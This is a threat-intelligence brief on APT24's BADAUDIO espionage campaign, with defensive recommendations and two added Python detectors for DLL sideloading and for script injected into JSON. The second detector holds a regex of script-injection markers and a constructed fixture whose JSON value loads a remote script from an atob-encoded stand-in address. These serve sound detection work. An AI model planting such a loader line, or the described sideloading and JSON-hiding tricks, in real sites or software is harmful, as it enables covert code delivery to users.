APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains
Summary:
Google Threat Intelligence Group (GTIG) is tracking a persistent, three-year PRC-nexus espionage campaign attributed to APT24, centered on a custom, heavily obfuscated downloader known as BADAUDIO. The actor's operations have evolved across multiple delivery vectors: early strategic web compromises targeting visitors of legitimate websites, a large-scale supply-chain compromise of a Taiwanese digital marketing firm that exposed more than 1,000 domains, and targeted phishing campaigns abusing trusted cloud services. BADAUDIO is a first-stage loader written in C++ that uses AES-encrypted C2 traffic, embeds a host fingerprint in an HTTP cookie, and applies control-flow flattening to hinder static and dynamic analysis. It executes via DLL search-order hijacking, including multi-file execution chains in which the malicious DLL is dropped next to a legitimate executable that sideloads it. In several cases BADAUDIO downloaded and decrypted a Cobalt Strike Beacon whose watermark recurs across other APT24 operations.
APT24's web-based delivery relies on browser fingerprinting, conditional payload delivery, and fake update prompts that are served only to Windows systems. The supply-chain compromise demonstrated both operational persistence and adaptive script modification, including hiding malicious JavaScript inside JSON files to evade detection. In parallel, APT24's phishing campaigns used personalized lures, cloud storage, password-protected archives, and tracking pixels to confirm which recipients opened the lure before following up. Across all phases, the campaign reflects sustained investment in stealth, infrastructure rotation, targeted delivery logic, and abuse of trusted services, all hallmarks of modern PRC-nexus espionage operations. GTIG responded by adding the malicious domains and files to the Safe Browsing blocklist and notifying the affected organizations to help disrupt the campaign.
Security Officer Comments:
APT24 continues to demonstrate a mature, adaptive operational style that blends stealthy access vectors with large-scale delivery mechanisms. Its repeated use of browser fingerprinting, multi-layer script obfuscation, and DLL sideloading shows a priority on minimizing detection opportunities while maintaining long-term access. The re-compromise of the Taiwanese marketing firm shows intent to control an upstream distribution channel rather than isolated targets. The recurring Cobalt Strike watermark suggests tooling reuse across campaigns. Taken together, APT24's behavior aligns with broader PRC-nexus trends toward low-noise initial access, supply-chain leverage, and precision targeting based on environmental profiling.
Suggested Corrections:
- Restrict where DLLs may load from: keep Safe DLL search mode enabled, use application control (WDAC or AppLocker) to block unsigned DLLs loading from user-writable directories, and alert in EDR when an executable loads an unsigned DLL from its own directory under a user profile, ProgramData, or Temp.
- Hunt for beaconing with unusually long, high-entropy Cookie headers to newly seen domains, for script tags loading from unexpected third-party hosts, and for the FingerprintJS2 library or MurmurHash3 routines appearing in pages or JSON responses where the site never shipped them; both are legitimate libraries, so the signal is their unexpected presence, not the library itself.
- Deploy a Content Security Policy that allowlists script sources and add Subresource Integrity hashes to all third-party scripts; baseline the hashes of served script and JSON resources and alert on unexpected changes, since the actor hid JavaScript inside JSON files and JSON endpoints therefore belong in the baseline.
- Treat links to cloud-storage-hosted, password-protected archives as high risk: quarantine them by default and strip or rewrite tracking pixels, since the actor used both to validate targets before following up.
- Ingest the indicators from the GTIG report into blocklists and into retrospective searches of proxy and DNS logs; any historical hit warrants a host investigation for sideloaded DLLs and a resident Cobalt Strike Beacon.
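As an added, illustrative detection for the DLL sideloading correction above and the loader behavior described in the summary (this is not GTIG code and is not derived from BADAUDIO samples), the following Python scores Sysmon Event ID 7 (ImageLoad) records: a DLL loaded from the process's own directory, unsigned or with an invalid signature, in a user-writable location. The user-writable prefixes and the list of commonly shadowed system DLLs are assumptions to tune per estate, and the sample events are constructed.

```python
"""Score Sysmon Event ID 7 (ImageLoad) records for DLL search-order hijacking.

Added example for this brief; not GTIG code and not derived from BADAUDIO
samples. A hit means: a DLL was loaded from the process's own directory
(resolved by search order rather than from System32), it is unsigned or its
signature is not valid, and that directory is one a standard user can write
to. A DLL whose name shadows a Windows system DLL raises the severity.
Field names follow Sysmon's ImageLoad schema; the events are constructed.
"""
import ntpath
from typing import Dict, Iterable, List, Tuple

# Locations a standard user can write to (assumption: extend for your estate).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Windows system DLLs frequently shadowed by a same-named file placed next to
# the EXE. Partial list; treat as an assumption to extend from your own data.
SHADOWABLE_SYSTEM_DLLS = {
    "version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll",
    "profapi.dll", "userenv.dll", "mpr.dll", "winmm.dll",
}


def is_user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def classify(event: Dict[str, str]) -> str:
    """Return 'none', 'medium' or 'high' for one Sysmon event."""
    if str(event.get("EventID", "")) != "7":
        return "none"
    image = event.get("Image", "")
    loaded = event.get("ImageLoaded", "")
    if not loaded.lower().endswith(".dll"):
        return "none"
    # Same directory as the process image => came from the search order, not a system path.
    if ntpath.dirname(image).lower() != ntpath.dirname(loaded).lower():
        return "none"
    if not is_user_writable(loaded):
        return "none"
    # Sysmon's Signed/SignatureStatus describe the *loaded* image, not the parent process.
    signed_ok = (event.get("Signed", "false").lower() == "true"
                 and event.get("SignatureStatus", "").lower() == "valid")
    if signed_ok:
        return "none"
    if ntpath.basename(loaded).lower() in SHADOWABLE_SYSTEM_DLLS:
        return "high"
    return "medium"


def find_sideload_candidates(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(severity, process image, loaded DLL) for every event that scores above 'none'."""
    hits = []
    for ev in events:
        sev = classify(ev)
        if sev != "none":
            hits.append((sev, ev["Image"], ev["ImageLoaded"]))
    return hits


# Constructed sample telemetry (not real APT24 artefacts).
SAMPLE_EVENTS = [
    # Signed system DLL from System32: normal resolution.
    {"EventID": "7", "Image": r"C:\Users\alice\AppData\Local\Temp\upd\viewer.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    # Unsigned version.dll beside the EXE in Temp: classic hijack shape.
    {"EventID": "7", "Image": r"C:\Users\alice\AppData\Local\Temp\upd\viewer.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\upd\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # Unsigned helper beside an EXE in ProgramData: lower confidence, still worth a look.
    {"EventID": "7", "Image": r"C:\ProgramData\Acme\agent.exe",
     "ImageLoaded": r"C:\ProgramData\Acme\helper.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # Unsigned DLL under Program Files (admin-writable only): out of scope for this rule.
    {"EventID": "7", "Image": r"C:\Program Files\Acme\agent.exe",
     "ImageLoaded": r"C:\Program Files\Acme\helper.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # ProcessCreate, not ImageLoad.
    {"EventID": "1", "Image": r"C:\Users\alice\AppData\Local\Temp\upd\viewer.exe",
     "ImageLoaded": ""},
]

if __name__ == "__main__":
    for sev, proc, dll in find_sideload_candidates(SAMPLE_EVENTS):
        print(f"[{sev}] {proc} -> {dll}")
```

Sysmon only emits Event ID 7 when ImageLoad is enabled in its configuration, and the Signed/SignatureStatus fields describe the loaded DLL rather than the parent process; to require a signed parent as well, join on the process image's signature from your EDR. Per-user installed applications that legitimately ship unsigned helper DLLs will land in the medium tier, so baseline those by hash before turning the rule into an alert.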
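For the CSP/SRI and script-audit correction above, and for the JSON-embedded JavaScript technique described in the summary, here is an added Python audit (example code, not GTIG tooling and not the injected script itself) that inventories third-party script tags missing integrity hashes, scans JSON responses for string values that look like script loaders, and diffs resource hashes against a recorded baseline. The JS_MARKERS heuristic, the host names and the sample HTML and JSON bodies are constructed assumptions.

```python
"""Audit a site's scripts for two things the APT24 supply-chain phase abused:
third-party <script src> tags with no Subresource Integrity, and "JSON"
resources that actually carry JavaScript.

Added example for this brief; it is not GTIG tooling and not the injected
code itself. The HTML and JSON bodies below are constructed. The JS_MARKERS
heuristic is an assumption about what injected loaders tend to contain, so a
hit means "review this resource", not "confirmed malicious".
"""
import hashlib
import json
import re
from html.parser import HTMLParser
from typing import Dict, Iterator, List
from urllib.parse import urlparse

# Tokens that have no business inside a data file (assumed markers).
JS_MARKERS = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|createElement\s*\(\s*['\"]script['\"]"
    r"|\batob\s*\(|<script\b|document\.write\s*\(",
    re.IGNORECASE,
)


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> tag in a page."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag.lower() == "script":
            self.scripts.append({k.lower(): (v or "") for k, v in attrs})


def scripts_without_sri(html: str, first_party_host: str) -> List[str]:
    """External script URLs loaded from another host without an integrity= hash."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        src = s.get("src")
        if not src:
            continue  # inline script: governed by CSP, not SRI
        host = urlparse(src).hostname or first_party_host  # relative URL => first party
        if host != first_party_host and not s.get("integrity"):
            findings.append(src)
    return findings


def _walk_strings(node) -> Iterator[str]:
    """Yield every string value in a parsed JSON document, at any depth."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for v in node.values():
            yield from _walk_strings(v)
    elif isinstance(node, list):
        for v in node:
            yield from _walk_strings(v)


def json_carrying_js(raw: str) -> List[str]:
    """String values inside a JSON body that look like executable JavaScript.
    A body that is not JSON at all but contains script markers is reported as
    one finding: a JSON endpoint returning raw script is the same smell."""
    try:
        doc = json.loads(raw)
    except ValueError:
        return ["<not valid JSON>"] if JS_MARKERS.search(raw) else []
    return [s for s in _walk_strings(doc) if JS_MARKERS.search(s)]


def changed_resources(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """URLs whose current body hash differs from the baseline; new URLs count as changed."""
    return sorted(
        url for url, body in current.items()
        if hashlib.sha256(body.encode("utf-8")).hexdigest() != baseline.get(url)
    )


# Constructed sample page and resources (not real APT24 artefacts).
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example/lib.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://tag.marketing-vendor.example/tag.js"></script>
</head><body></body></html>"""

CLEAN_JSON = json.dumps({"campaign": "spring", "items": [{"id": 1, "title": "Hello"}]})
INJECTED_JSON = json.dumps({
    "campaign": "spring",
    "items": [{"id": 1, "title": "Hello"}],
    "cfg": "var s=document.createElement('script');s.src=atob('Ly9leGFtcGxl');document.head.appendChild(s);",
})

BASELINE = {"/api/campaign.json": hashlib.sha256(CLEAN_JSON.encode("utf-8")).hexdigest()}

if __name__ == "__main__":
    print("no SRI:", scripts_without_sri(SAMPLE_HTML, "www.example"))
    print("JS in JSON:", json_carrying_js(INJECTED_JSON))
    print("changed:", changed_resources(BASELINE, {"/api/campaign.json": INJECTED_JSON}))
```

Run it on a schedule against crawled copies of your pages and JSON endpoints and diff the output; pair it with a Content Security Policy whose script-src names only the hosts the inventory returns. A hit from json_carrying_js is a review trigger rather than a verdict, since legitimate CMS exports can carry HTML fragments, so tune the markers against your own clean corpus before alerting.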
https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/